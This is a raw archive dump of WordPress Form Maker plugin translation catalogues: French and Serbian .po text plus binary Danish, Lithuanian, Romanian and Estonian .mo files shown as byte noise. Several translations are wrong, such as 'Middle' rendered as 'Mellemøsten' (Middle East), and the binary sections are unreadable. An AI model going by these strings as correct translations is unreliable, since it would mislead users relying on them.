msgstr "Votre courriel de vérification a expiré."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Lien de vérification est invalide."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "Champ est obligatoire"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Ceci n'est pas une adresse e-mail valide"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Vous ne pouvez pas sélectionner anciens dates. Choisissez une date à partir "
"de l'actuel."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "la "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "valeur doit être comprise entre "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Quantité "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Votre note doit être inférieure à "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Titre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Prénom"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Nom"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Moyenne"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Code de zone"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "N° téléphone"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dollars "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Cents "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "à partir de "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "à"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "aller "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "remettre "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Sélectionnez un champ "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Sélectionnez une date"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-da_DK.mo000060400000007130152434416630012136 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
G
S
Z
`
c
h
q
z
!�
"�
�
�
�
�
�

(=FN^py
��	�?��)MB'����N�*0
 [
$|
$�
B�
 	*>4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:52+0400
PO-Revision-Date: 2015-05-22 16:52+0400
Last-Translator: 
Language-Team: 
Language: da
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AprilOmrådekodeAugustcentsByLandDecemberdollars Fejl, blev e-mailen ikke sendt.Fejl, kan filen ikke kan flyttes.Fejl, forkert sikkerhedskode kode.FebruarFørstefra gå JanuarJuliJuniSidsteMartsMajMellemøstenIntet blev fremlagt.NovemberOktobertelefonnummer. Postal / Zip Codemængde Nulstil Vælg en datoVælg et felt SeptemberDu har desværre ikke tilladelse til at uploade denne type fil.Stat / provins / regionGadeGade Linje 2den Filen overskrider den tilladte størrelseDette felt %s kræver en unik indgang, og denne værdi var allerede indsendt.Dette er ikke en gyldig e-mail-adresse.TiteltilBekræftelseslink er ugyldigt.Du kan ikke vælge tidligere datoer. Vælg en dato starter fra den nuværende.Din e-mail-adresse er allerede bekræftet.Din e-mail er blevet bekræftet.Din e-mail verifikation er udløbet.Din formular blev succesfuldt sendt.Din IP er sortlistet. Kontakt venligst hjemmesiden administrator. Din score skal være mindre end felt er påkrævet.værdi skal være mellem languages/form_maker-lt_LT.mo000060400000007345152434416630012222 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
J

W
b
i
q
x
�
$�
&�
#�
�
	
)4	:	DN	eov��
���	�=� ?
FTXOx2�	�
$
U-
3�
,�
.�
&U:+���4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:00+0400
PO-Revision-Date: 2015-05-22 17:00+0400
Last-Translator: 
Language-Team: 
Language: lt
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
BalandisRajono kodasRugpjūtisCentųMiestasŠalisGruodisDoleriųKlaida, laiškas nebuvo išsiųstas.Klaida, failas negali būti perkeltas.Klaida, neteisingą apsaugos kodą.VasarisPirmasNuoeiti SausisLiepaBirželisPaskutinisKovasGegužėsVidurinisNieko nebuvo pateikta.LapkritisSpalisTelefono numerisPašto kodas / indeksasKiekisAtstatyti Pasirinkite datąPasirinkite laukasRugsėjisAtsiprašome, bet jums neleidžiama įkelti šį failo tipą.Valstija / provincija / regionasGatvėGatvė Line 2TheFailas viršija leistiną dydįŠis laukelis %s reikalauja unikalų įrašą, o ši vertė jau buvo pateiktas.Tai nėra galiojantis elektroninio pašto adresą.KreipinysĮPatvirtinimo nuoroda yra neteisinga.Jūs negalite pasirinkti buvusius datos. Pasirinkite datą, pradedant nuo dabartinio.Jūsų elektroninio pašto adresas jau patikrintas.Jūsų el.pašto buvo sėkmingai patikrinta.Jūsų el.pašto patikrinimas laikas baigėsi.Jūsų forma buvo sėkmingai pateikta.Jūsų ip yra juodajame sąraše. Prašome susisiekti su svetainės administratoriumiJūsų rezultatas turi būti mažesnis nei laukas būtinas.vertė turi būti tarp languages/form_maker-ro_RO.mo000060400000005743152434416630012224 0ustar00��+t;���	��������,LU[`hmrw}�������	�7�4C$YK~"���%�A^}���em|���	�	� �$�&�		 	&	,	5	;	A	
I	T	X	_		z		�	�	�		�	
�	E�	
)
0
,F
Us
,�
�
�
+Q1*�� �
#'&%+"(!$*	
) AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantitySeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2The file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToYour form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-05-27 16:12+0300
PO-Revision-Date: 2014-05-27 16:13+0300
Last-Translator: 
Language-Team: 
Language: ro
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.6.3
X-Poedit-SearchPath-0: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker
ApriliePrefixul zoneiAugustCenținom.ŢaraDecembrieDe dolariEroare, e-mail nu a fost trimis.Eroare, fişierul nu poate fi mutat.De eroare, cod de securitate incorect.FebruariePrimaDe laIanuarieIulieIunieUltimulMerg incetMaiMIJLOCNimic nu a fost prezentat.NoiembrieOctombrieNumar de telefonPostal / Cod postalCantitateSeptembrieNe pare rău, nu li se permite să încărcaţi acest tip de fişier.Stat / Provincie / RegiuneAdresaStrada Linia Adresa 2Fişierul depăşeşte dimensiunea permis deAcest câmp %s necesită o intrare unică şi această valoare a fost deja prezentat.Aceasta nu este o adresă de e-mail validă.TitluPentru aFormularul de dvs. a fost trimis cu succes.IP-ul este pe lista neagră. Vă rugăm să contactați administratorul site-uluiScorul dvs. ar trebui să fie mai mică decâmp este necesar.Valoarea trebuie să fie între languages/form_maker-et.mo000060400000007072152434416630011611 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
	H
R
Y
`
e
	j
t
 }
�
�
�
�
�
�
�
�
 3<ETipx
�	�@���
�	
G*"r	���B�(
".
&Q
x
G�
&�
4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:54+0400
PO-Revision-Date: 2015-05-22 16:54+0400
Last-Translator: 
Language-Team: 
Language: et
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AprillArea CodeAugustsenti LinnRiikDetsemberDollars Viga, elektronposti ei saadetud.Viga, faili ei saa liigutada.Viga, vale turvakoodi.VeebruarEsimenepärit minna JaanuarJuuliJuuniViimaneMärtsMaiKesk-Miski ei esitatud.NovemberOktooberTelefoninumberPostal / PostiindeksKogus Taasta Vali aegValige väli SeptemberVabandust, teil ei ole lubatud üles laadida seda tüüpi faili.State / Province / RegionTänavTänav Line 2TheFail ületab lubatud suuruseSellel väljal %s nõuab portaali ja selle väärtus oli juba esitatud.See ei ole kehtiv e-posti aadress.*{title}*kuniKontrollimine link on vigane.Sa ei saa valida endine kuupäev. Vali kuupäev alates praegusest.Teie e-posti aadress on juba kinnitatud.Sinu e-post on edukalt kinnitatud.Sinu e-posti kontrollimine on aegunud.Teie vorm on edukalt esitatud.Teie IP on mustas nimekirjas. Palun võta ühendust veebilehe haldaja. Sinu tulemus peaks olema väiksem kui valdkonnas on vaja.väärtus peab olema vahemikus languages/form_maker-sr_RS.po000060400000060270152434416630012233 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:04+0400\n"
"PO-Revision-Date: 2015-05-22 17:04+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: sr\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Adresa:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Адреса Улица Линија 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Град"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Држава / покрајина / регион"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Поштански / Поштански број"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Држава"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Јануар"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Фебруар"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Март"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Април"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "мај"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "јуна"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Јул"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Август"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
